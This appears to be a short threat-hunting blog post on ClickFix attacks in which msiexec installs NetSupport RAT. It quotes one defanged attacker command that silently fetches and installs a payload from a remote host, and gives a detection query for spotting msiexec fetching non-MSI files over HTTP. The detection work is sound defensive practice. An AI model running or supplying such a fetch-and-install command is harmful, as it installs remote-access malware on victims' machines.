235. Adversaries Abuse Msiexec as a Part of ClickFix

Hello everyone!

There're lots of legitimate binaries used by threat actors as a part of ClickFix. PowerShell, Windows Command Shell, mshta... But today we'll look at the following technique: System Binary Proxy Execution: Msiexec (T1218.007).

This time the adversary abused msiexec to install NetSupport RAT to the compromised system:

msiexec /i hXXps://cf-2-up[.]com/res/skirthub /qn 87af19ba=a296378a+606fc0b0*05a130cd(980b6676^174d7ea5*b01eaa45

For example, we can look for msiexec running files without .msi extension from a remote server:

event_type: "processcreatewin"

AND

proc_file_path: "msiexec.exe"

AND

cmdline: *http*

AND NOT

cmdline: *msi*

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge